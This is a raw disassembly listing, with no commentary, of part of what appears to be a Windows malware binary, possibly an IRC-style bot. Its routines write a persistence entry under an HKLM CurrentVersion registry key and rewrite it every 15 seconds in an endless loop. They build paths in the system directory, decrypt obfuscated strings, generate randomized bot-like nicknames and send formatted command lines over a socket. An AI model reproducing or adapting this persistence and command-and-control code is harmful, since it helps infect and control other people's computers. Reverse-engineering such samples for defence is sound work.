		add	eax, eax
		shr	edi, 1Dh
		xor	ebp, ebp
		or	edx, edi
		add	eax, eax
		or	esi, ebp
		push	ebx
		mov	[ebx+0C0h], edx
		mov	[ebx+0C4h], esi
		mov	[ebx+0C8h], eax
		mov	[ebx+0CCh], ecx
		call	sub_415050
		add	esp, 4
		xor	esi, esi

loc_4178A5:				; CODE XREF: sub_417760+171j
		mov	ecx, esi
		not	ecx
		and	ecx, 7
		mov	edx, esi
		shr	edx, 3
		mov	eax, [ebx+edx*8+10h]
		mov	edx, [ebx+edx*8+14h]
		add	ecx, ecx
		add	ecx, ecx
		add	ecx, ecx
		call	sub_411EA0
		mov	ecx, [esp+10h+arg_0]
		mov	[esi+ecx], al
		add	esi, 1
		cmp	esi, 40h
		jb	short loc_4178A5
		pop	edi
		pop	esi
		pop	ebp
		pop	ecx
		retn
sub_417760	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4178E0	proc near		; CODE XREF: sub_41C1B3+A3p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		sub	esp, 0Ch
		push	ebx
		mov	ebx, [esp+10h+arg_4]
		mov	eax, [ebx]
		push	ebp
		mov	ebp, [esp+14h+arg_0]
		push	esi
		push	edi
		and	eax, 7Fh
		mov	edi, 80h
		sub	edi, eax
		mov	esi, ecx
		xor	ecx, ecx
		add	[ebx], ebp
		adc	[ebx+4], ecx
		mov	edx, [ebx+4]
		cmp	edx, ecx
		ja	short loc_41791B
		jb	short loc_417913
		mov	ecx, [ebx]
		cmp	ecx, ebp
		jnb	short loc_41791B

loc_417913:				; CODE XREF: sub_4178E0+2Bj
		add	dword ptr [ebx+8], 1
		adc	dword ptr [ebx+0Ch], 0

loc_41791B:				; CODE XREF: sub_4178E0+29j
					; sub_4178E0+31j
		cmp	ebp, edi
		jb	loc_4179BF

loc_417923:				; CODE XREF: sub_4178E0+D9j
		push	edi
		lea	edx, [ebx+eax+50h]
		push	esi
		push	edx
		call	sub_4081B0
		add	esi, edi
		add	esp, 0Ch
		sub	ebp, edi
		mov	[esp+1Ch+var_4], esi
		mov	[esp+1Ch+arg_0], ebp
		mov	edi, 80h
		mov	[esp+1Ch+var_8], 0
		mov	esi, 10h
		lea	edx, [ebx+0D0h]

loc_417956:				; CODE XREF: sub_4178E0+BCj
		mov	eax, [edx-8]
		mov	ecx, [edx-4]
		sub	edx, 8
		mov	ebx, eax
		sub	esi, 1
		ror	ebx, 8
		and	ebx, 0FF00FF00h
		rol	eax, 8
		and	eax, 0FF00FFh
		or	ebx, eax
		mov	ebp, ecx
		xor	eax, eax
		ror	ebp, 8
		and	ebp, 0FF00FF00h
		rol	ecx, 8
		and	ecx, 0FF00FFh
		or	ebp, ecx
		xor	ecx, ecx
		or	eax, ebp
		or	ebx, ecx
		test	esi, esi
		mov	[edx], eax
		mov	[edx+4], ebx
		jnz	short loc_417956
		mov	ebx, [esp+1Ch+arg_4]
		push	ebx
		call	sub_415050
		mov	ebp, [esp+20h+arg_0]
		mov	eax, [esp+20h+var_8]
		mov	esi, [esp+20h+var_4]
		add	esp, 4
		cmp	ebp, edi
		jnb	loc_417923

loc_4179BF:				; CODE XREF: sub_4178E0+3Dj
		push	ebp
		lea	edx, [eax+ebx+50h]
		push	esi
		push	edx
		call	sub_4081B0
		add	esp, 0Ch
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 0Ch
		retn
sub_4178E0	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ecx
		push	eax
		call	sub_417760
		add	esp, 4
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4179EC	proc near		; CODE XREF: sub_4179EC+D5p
					; sub_41B423+5F4p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_C		= word ptr  14h
arg_14		= dword	ptr  1Ch
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h
arg_24		= dword	ptr  2Ch
arg_28		= byte ptr  30h
arg_2B		= byte ptr  33h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		cmp	[ebp+arg_28], 0
		push	ebx
		push	esi
		push	edi
		jz	short loc_417A05
		mov	ecx, [ebp+arg_4]
		shr	ecx, 18h
		or	cl, 1
		jmp	short loc_417A0B
; ---------------------------------------------------------------------------

loc_417A05:				; CODE XREF: sub_4179EC+Cj
		mov	cl, byte ptr [ebp+arg_4+3]
		and	cl, 0FEh

loc_417A0B:				; CODE XREF: sub_4179EC+17j
		movzx	eax, word ptr [ebp+arg_24]
		mov	ebx, [ebp+arg_20]
		lea	edx, [ebx+18h]
		cmp	edx, eax
		ja	short loc_417A28
		lea	edx, [ebx+18h]
		mov	[ebp+arg_14], ebx
		or	cl, 2
		mov	[ebp+arg_2B], 0
		jmp	short loc_417A39
; ---------------------------------------------------------------------------

loc_417A28:				; CODE XREF: sub_4179EC+2Bj
		mov	dx, word ptr [ebp+arg_24]
		add	eax, 0FFFFFFE8h
		mov	[ebp+arg_14], eax
		and	cl, 0FDh
		mov	[ebp+arg_2B], 1

loc_417A39:				; CODE XREF: sub_4179EC+3Aj
		movzx	eax, dx
		push	eax
		mov	byte ptr [ebp+arg_4+3],	cl
		mov	[ebp+arg_C], dx
		mov	[ebp+var_4], eax
		call	sub_403C6E
		test	eax, eax
		pop	ecx
		mov	[ebp+arg_20], eax
		jz	loc_417AD8
		push	6
		pop	ecx
		mov	edi, eax
		lea	esi, [ebp+arg_4]
		rep movsd
		mov	edi, [ebp+arg_14]
		mov	esi, [ebp+arg_1C]
		push	edi
		add	eax, 18h
		push	esi
		push	eax
		call	sub_4081B0
		add	esp, 0Ch
		push	0
		lea	eax, [ebp+var_8]
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_20]
		push	[ebp+arg_0]
		call	ds:off_41E088
		test	eax, eax
		jz	short loc_417ACF
		mov	eax, [ebp+var_4]
		cmp	[ebp+var_8], eax
		jnz	short loc_417ACF
		push	[ebp+arg_20]
		call	sub_403B91
		cmp	[ebp+arg_2B], 0
		pop	ecx
		jz	short loc_417ACB
		push	0
		push	[ebp+arg_24]
		sub	ebx, edi
		push	ebx
		add	edi, esi
		push	edi
		sub	esp, 18h
		push	6
		pop	ecx
		mov	edi, esp
		push	[ebp+arg_0]
		lea	esi, [ebp+arg_4]
		rep movsd
		call	sub_4179EC
		add	esp, 2Ch
		jmp	short loc_417ADA
; ---------------------------------------------------------------------------

loc_417ACB:				; CODE XREF: sub_4179EC+B8j
		mov	al, 1
		jmp	short loc_417ADA
; ---------------------------------------------------------------------------

loc_417ACF:				; CODE XREF: sub_4179EC+A1j
					; sub_4179EC+A9j
		push	[ebp+arg_20]
		call	sub_403B91
		pop	ecx

loc_417AD8:				; CODE XREF: sub_4179EC+66j
		xor	al, al

loc_417ADA:				; CODE XREF: sub_4179EC+DDj
					; sub_4179EC+E1j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4179EC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417ADF	proc near		; CODE XREF: sub_417C06+154p
					; sub_417D99+152p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	eax, [ebp+var_4]
		push	eax
		push	ebx
		push	0F003Fh
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		push	80000002h
		call	ds:off_41E004
		test	eax, eax
		jz	short loc_417B14
		push	[ebp+var_4]
		call	ds:off_41E010
		xor	al, al

loc_417B11:				; CODE XREF: sub_417ADF+68j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_417B14:				; CODE XREF: sub_417ADF+25j
		mov	eax, [ebp+arg_8]
		push	esi
		lea	esi, [eax+1]

loc_417B1B:				; CODE XREF: sub_417ADF+41j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_417B1B
		sub	eax, esi
		push	eax
		push	[ebp+arg_8]
		push	1
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+var_4]
		call	ds:off_41E00C
		test	eax, eax
		pop	esi
		jz	short loc_417B49

loc_417B3C:				; CODE XREF: sub_417ADF+6Cj
		push	[ebp+var_4]
		call	ds:off_41E010
		mov	al, bl
		jmp	short loc_417B11
; ---------------------------------------------------------------------------

loc_417B49:				; CODE XREF: sub_417ADF+5Bj
		mov	bl, 1
		jmp	short loc_417B3C
sub_417ADF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417B4D	proc near		; CODE XREF: sub_417C06+113p
					; sub_417D99+100p ...

var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	ecx
		lea	eax, [ebp+var_4]
		push	eax
		push	1
		push	0
		push	[ebp+arg_4]
		push	80000002h
		call	ds:off_41E02C
		test	eax, eax
		jnz	short loc_417B95
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_C]
		lea	eax, [ebp+arg_0]
		push	eax
		push	0
		push	[ebp+arg_8]
		push	[ebp+var_4]
		call	ds:off_41E008
		test	eax, eax
		jnz	short loc_417B95
		push	[ebp+var_4]
		call	ds:off_41E010
		mov	al, 1
		leave
		retn
; ---------------------------------------------------------------------------

loc_417B95:				; CODE XREF: sub_417B4D+1Cj
					; sub_417B4D+39j
		push	[ebp+var_4]
		call	ds:off_41E010
		push	[ebp+arg_10]
		push	0
		push	[ebp+arg_C]
		call	sub_408130
		add	esp, 0Ch
		xor	al, al
		leave
		retn
sub_417B4D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417BB2	proc near		; CODE XREF: sub_41A0E3+134p
					; sub_41A70B+F2p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	eax, [ebp+var_4]
		push	eax
		push	ebx
		push	0F003Fh
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:off_41E004
		test	eax, eax
		jz	short loc_417BE5
		push	[ebp+var_4]
		call	ds:off_41E010
		xor	al, al

loc_417BE2:				; CODE XREF: sub_417BB2+4Ej
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_417BE5:				; CODE XREF: sub_417BB2+23j
		push	[ebp+arg_8]
		push	[ebp+var_4]
		call	ds:off_41E000
		test	eax, eax
		jz	short loc_417C02

loc_417BF5:				; CODE XREF: sub_417BB2+52j
		push	[ebp+var_4]
		call	ds:off_41E010
		mov	al, bl
		jmp	short loc_417BE2
; ---------------------------------------------------------------------------

loc_417C02:				; CODE XREF: sub_417BB2+41j
		mov	bl, 1
		jmp	short loc_417BF5
sub_417BB2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=94h


sub_417C06	proc near		; CODE XREF: sub_41C7BA:loc_41CAC4p

var_114		= dword	ptr -114h
var_110		= dword	ptr -110h
var_10C		= dword	ptr -10Ch
var_108		= dword	ptr -108h
var_104		= byte ptr -104h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-94h]
		sub	esp, 114h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+94h+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	edi, 100h
		push	edi
		call	sub_402BD6
		mov	esi, eax
		push	edi
		mov	[ebp+94h+var_110], esi
		call	sub_402BD6
		push	edi
		mov	[ebp+94h+var_108], eax
		call	sub_402BD6
		push	edi
		mov	[ebp+94h+var_114], eax
		call	sub_402BD6
		push	[ebp+94h+var_114]
		mov	[ebp+94h+var_10C], eax
		call	sub_402FD3
		push	eax
		xor	ebx, ebx
		push	ebx
		push	[ebp+94h+var_114]
		call	sub_408130
		push	[ebp+94h+var_10C]
		call	sub_402FD3
		push	eax
		push	ebx
		push	[ebp+94h+var_10C]
		call	sub_408130
		push	edi
		lea	eax, [ebp+94h+var_104]
		push	ebx
		push	eax
		call	sub_408130
		push	esi
		call	sub_402FD3
		add	esp, 40h
		push	eax
		push	ebx
		push	esi
		call	sub_408130
		push	[ebp+94h+var_108]
		call	sub_402FD3
		push	eax
		push	ebx
		push	[ebp+94h+var_108]
		call	sub_408130
		push	esi
		call	sub_402FD3
		push	eax
		mov	ebx, offset aDDucivd ; ""
		call	sub_41A33D
		mov	esi, [ebp+94h+var_108]
		push	esi
		call	sub_402FD3
		push	eax
		mov	ebx, offset aDfstcvDsd ; "τ"
		call	sub_41A33D
		mov	ebx, [ebp+94h+var_114]
		push	ebx
		call	sub_402FD3
		add	esp, 30h
		dec	eax
		push	eax
		push	ebx
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		push	esi
		mov	esi, [ebp+94h+var_10C]
		push	ebx
		push	offset dword_421298
		push	esi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_417CFE:				; CODE XREF: sub_417C06+FDj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_417CFE
		sub	eax, ecx
		push	edi
		mov	[eax+esi], dl
		lea	eax, [ebp+94h+var_104]
		push	eax
		push	[ebp+94h+var_110]
		push	offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	1
		call	sub_417B4D
		add	esp, 14h
		test	al, al
		jz	short loc_417D51
		lea	eax, [ebp+94h+var_104]
		mov	ecx, esi

loc_417D2A:				; CODE XREF: sub_417C06+13Cj
		mov	dl, [ecx]
		cmp	dl, [eax]
		jnz	short loc_417D48
		test	dl, dl
		jz	short loc_417D44
		mov	dl, [ecx+1]
		cmp	dl, [eax+1]
		jnz	short loc_417D48
		inc	ecx
		inc	ecx
		inc	eax
		inc	eax
		test	dl, dl
		jnz	short loc_417D2A

loc_417D44:				; CODE XREF: sub_417C06+12Cj
		xor	eax, eax
		jmp	short loc_417D4D
; ---------------------------------------------------------------------------

loc_417D48:				; CODE XREF: sub_417C06+128j
					; sub_417C06+134j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_417D4D:				; CODE XREF: sub_417C06+140j
		test	eax, eax
		jz	short loc_417D62

loc_417D51:				; CODE XREF: sub_417C06+11Dj
		push	esi
		push	[ebp+94h+var_110]
		push	offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		call	sub_417ADF
		add	esp, 0Ch

loc_417D62:				; CODE XREF: sub_417C06+149j
		push	[ebp+94h+var_110]
		call	sub_403129
		push	[ebp+94h+var_108]
		call	sub_403129
		push	ebx
		call	sub_403129
		push	esi
		call	sub_403129
		mov	ecx, [ebp+94h+var_4]
		add	esp, 10h
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 94h
		leave
		retn
sub_417C06	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_417D99	proc near		; DATA XREF: sub_41C7BA+31Bo

var_504		= byte ptr -504h
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_304		= byte ptr -304h
var_303		= byte ptr -303h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_104		= byte ptr -104h
var_103		= byte ptr -103h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 504h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	esi, 0FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+var_203]
		push	ebx
		push	eax
		mov	[ebp+var_204], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+var_403]
		push	ebx
		push	eax
		mov	[ebp+var_404], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+var_303]
		push	ebx
		push	eax
		mov	[ebp+var_304], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+var_103]
		push	ebx
		push	eax
		mov	[ebp+var_104], bl
		call	sub_408130
		add	esp, 30h
		mov	edi, 100h

loc_417E0E:				; CODE XREF: sub_417D99+1AEj
		push	edi
		lea	esi, [ebp+var_204]
		mov	ebx, offset aDDucivd ; ""
		call	sub_41A33D
		push	edi
		lea	esi, [ebp+var_404]
		mov	ebx, offset aDfstcvDsd ; "τ"
		call	sub_41A33D
		pop	ecx
		pop	ecx
		mov	esi, 0FFh
		push	esi
		lea	eax, [ebp+var_304]
		push	eax
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		lea	eax, [ebp+var_404]
		push	eax
		lea	eax, [ebp+var_304]
		push	eax
		push	offset aSS_3	; "%s\\%s"
		lea	eax, [ebp+var_104]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_104]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_417E71:				; CODE XREF: sub_417D99+DDj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_417E71
		sub	eax, ecx
		xor	ebx, ebx
		mov	[ebp+eax+var_104], bl
		push	edi
		lea	eax, [ebp+var_504]
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	1
		call	sub_417B4D
		add	esp, 14h
		test	al, al
		jz	short loc_417ED8
		lea	ecx, [ebp+var_504]
		lea	eax, [ebp+var_104]

loc_417EB1:				; CODE XREF: sub_417D99+130j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_417ECF
		cmp	dl, bl
		jz	short loc_417ECB
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_417ECF
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		cmp	dl, bl
		jnz	short loc_417EB1

loc_417ECB:				; CODE XREF: sub_417D99+120j
		xor	eax, eax
		jmp	short loc_417ED4
; ---------------------------------------------------------------------------

loc_417ECF:				; CODE XREF: sub_417D99+11Cj
					; sub_417D99+128j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_417ED4:				; CODE XREF: sub_417D99+134j
		cmp	eax, ebx
		jz	short loc_417EF3

loc_417ED8:				; CODE XREF: sub_417D99+10Aj
		lea	eax, [ebp+var_104]
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		call	sub_417ADF
		add	esp, 0Ch

loc_417EF3:				; CODE XREF: sub_417D99+13Dj
		push	edi
		lea	eax, [ebp+var_304]
		push	ebx
		push	eax
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_104]
		push	ebx
		push	eax
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_504]
		push	ebx
		push	eax
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_204]
		push	ebx
		push	eax
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_404]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 3Ch
		push	3A98h
		call	ds:off_41E0F8
		jmp	loc_417E0E
sub_417D99	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417F4C	proc near		; CODE XREF: sub_401C1D+C9p
					; sub_401C1D+E4p ...

var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 204h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		mov	esi, 1FFh
		push	esi
		lea	eax, [ebp+var_203]
		push	0
		push	eax
		mov	[ebp+var_204], 0
		call	sub_408130
		lea	eax, [ebp+arg_4]
		push	eax
		push	[ebp+arg_0]
		lea	eax, [ebp+var_204]
		push	esi
		push	eax
		call	sub_4039C4
		lea	eax, [ebp+var_204]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_417F9B:				; CODE XREF: sub_417F4C+54j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417F9B
		sub	eax, esi
		mov	[ebp+eax+var_204], cl
		lea	eax, [ebp+var_204]
		lea	esi, [eax+1]

loc_417FB4:				; CODE XREF: sub_417F4C+6Dj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_417FB4
		push	0
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		push	dword ptr [edi]
		call	ds:dword_41E228	; send
		mov	ecx, [ebp+var_4]
		test	eax, eax
		setnz	al
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_417F4C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_417FE1	proc near		; CODE XREF: sub_40177B+268p
					; sub_4019F3+21Ap ...

var_40C		= dword	ptr -40Ch
var_408		= dword	ptr -408h
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 40Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	edi
		mov	[ebp+var_408], eax
		mov	eax, [ebp+arg_8]
		mov	edi, 1FFh
		xor	ebx, ebx
		push	edi
		mov	[ebp+var_40C], eax
		lea	eax, [ebp+var_203]
		push	ebx
		push	eax
		mov	[ebp+var_204], bl
		call	sub_408130
		push	edi
		lea	eax, [ebp+var_403]
		push	ebx
		push	eax
		mov	[ebp+var_404], bl
		call	sub_408130
		add	esp, 18h
		cmp	[ebp+arg_4], 1
		jz	loc_4180FD
		push	esi
		push	0Dh
		call	sub_402BD6
		mov	esi, eax
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_C]
		lea	eax, [ebp+var_404]
		push	edi
		push	eax
		call	sub_4039C4
		lea	eax, [ebp+var_404]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41806E:				; CODE XREF: sub_417FE1+92j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41806E
		sub	eax, ecx
		push	esi
		mov	[ebp+eax+var_404], bl
		call	sub_402FD3
		push	eax
		mov	ebx, offset aIMJ ; ""
		call	sub_41A33D
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+var_40C]
		lea	eax, [ebp+var_204]
		push	esi
		push	offset aSSS_1	; "%s %s %s\r\n"
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_204]
		add	esp, 20h
		lea	ecx, [eax+1]

loc_4180BB:				; CODE XREF: sub_417FE1+DFj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4180BB
		sub	eax, ecx
		push	esi
		mov	[ebp+eax+var_204], dl
		call	sub_403129
		pop	ecx
		lea	eax, [ebp+var_204]
		lea	ecx, [eax+1]
		pop	esi

loc_4180DC:				; CODE XREF: sub_417FE1+100j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4180DC
		sub	eax, ecx
		push	0
		push	eax
		lea	eax, [ebp+var_204]
		push	eax
		mov	eax, [ebp+var_408]
		push	dword ptr [eax]
		call	ds:dword_41E228	; send

loc_4180FD:				; CODE XREF: sub_417FE1+5Dj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_417FE1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41810B	proc near		; CODE XREF: sub_418CAF+23Bp
					; sub_418F1C+39p

var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= byte ptr -40h
var_3F		= byte ptr -3Fh
var_3C		= byte ptr -3Ch
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 48h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		xor	eax, eax
		mov	[ebp+var_40], 0
		lea	edi, [ebp+var_3F]
		stosw
		stosb
		push	0Dh
		pop	ecx
		mov	esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
		lea	edi, [ebp+var_3C]
		rep movsd
		lea	eax, [ebp+var_48]
		push	eax
		movsb
		call	ds:off_41E1E8
		call	ds:dword_41E104	; GetTickCount
		mov	ecx, [ebp+var_48]
		mov	edx, [ebp+var_44]
		add	ecx, edx
		cmp	eax, ecx
		jb	short loc_418157
		add	ecx, eax
		jmp	short loc_418159
; ---------------------------------------------------------------------------

loc_418157:				; CODE XREF: sub_41810B+46j
		sub	ecx, eax

loc_418159:				; CODE XREF: sub_41810B+4Aj
		push	ecx
		call	sub_4038E4
		pop	ecx
		push	8
		pop	ecx
		xor	eax, eax
		mov	edi, ebx
		rep stosd
		push	offset asc_4214BC ; "["
		stosw
		push	22h
		push	ebx
		stosb
		call	sub_40307C
		mov	eax, ebx
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_418181:				; CODE XREF: sub_41810B+7Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418181
		xor	edi, edi
		sub	eax, esi
		push	edi
		mov	[eax+ebx], cl
		push	4
		pop	ecx
		lea	esi, [ebp+var_40]
		call	sub_419AD1
		pop	ecx
		mov	eax, esi
		push	eax
		push	ebx
		push	offset aSS	; "%s%s|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 14h
		lea	esi, [eax+1]

loc_4181B5:				; CODE XREF: sub_41810B+AFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4181B5
		sub	eax, esi
		push	edi
		push	4
		lea	esi, [ebp+var_40]
		mov	[eax+ebx], cl
		call	sub_419A9F
		mov	eax, esi
		push	eax
		push	ebx
		push	offset aSS_0	; "%s%s|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_4181E5:				; CODE XREF: sub_41810B+DFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4181E5
		sub	eax, esi
		mov	[eax+ebx], cl
		call	sub_419FC7
		test	al, al
		jz	short loc_41821C
		push	ebx
		push	offset aSp	; "%sP|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 10h
		lea	esi, [eax+1]

loc_418210:				; CODE XREF: sub_41810B+10Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418210
		sub	eax, esi
		mov	[eax+ebx], cl

loc_41821C:				; CODE XREF: sub_41810B+EDj
		call	sub_419A20
		mov	eax, dword_4288FC
		cmp	eax, edi
		mov	ecx, dword_4288F8
		jg	short loc_418258
		jl	short loc_418237
		cmp	ecx, 0Ah
		jnb	short loc_418258

loc_418237:				; CODE XREF: sub_41810B+125j
		push	eax
		push	ecx
		push	ebx
		push	offset aS0I64u	; "%s0%I64u|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 18h
		lea	esi, [eax+1]

loc_41824F:				; CODE XREF: sub_41810B+149j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41824F
		jmp	short loc_418277
; ---------------------------------------------------------------------------

loc_418258:				; CODE XREF: sub_41810B+123j
					; sub_41810B+12Aj
		push	eax
		push	ecx
		push	ebx
		push	offset aSI64u	; "%s%I64u|"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 18h
		lea	esi, [eax+1]

loc_418270:				; CODE XREF: sub_41810B+16Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418270

loc_418277:				; CODE XREF: sub_41810B+14Bj
		sub	eax, esi
		mov	byte ptr [eax+ebx], 0
		xor	esi, esi
		cmp	dword_427404, edi
		jle	short loc_4182C4

loc_418287:				; CODE XREF: sub_41810B+1B7j
		call	sub_4038F1
		push	31h
		pop	ecx
		xor	edx, edx
		div	ecx
		movsx	eax, [ebp+edx+var_3C]
		push	eax
		push	ebx
		push	offset aSC	; "%s%c"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 14h
		lea	edi, [eax+1]

loc_4182AF:				; CODE XREF: sub_41810B+1A9j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4182AF
		sub	eax, edi
		inc	esi
		mov	[eax+ebx], cl
		cmp	esi, dword_427404
		jl	short loc_418287

loc_4182C4:				; CODE XREF: sub_41810B+17Aj
		push	ebx
		push	offset aS_0	; "%s]"
		push	22h
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 10h
		lea	esi, [eax+1]

loc_4182DA:				; CODE XREF: sub_41810B+1D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4182DA
		sub	eax, esi
		mov	[eax+ebx], cl
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		mov	eax, ebx
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_41810B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


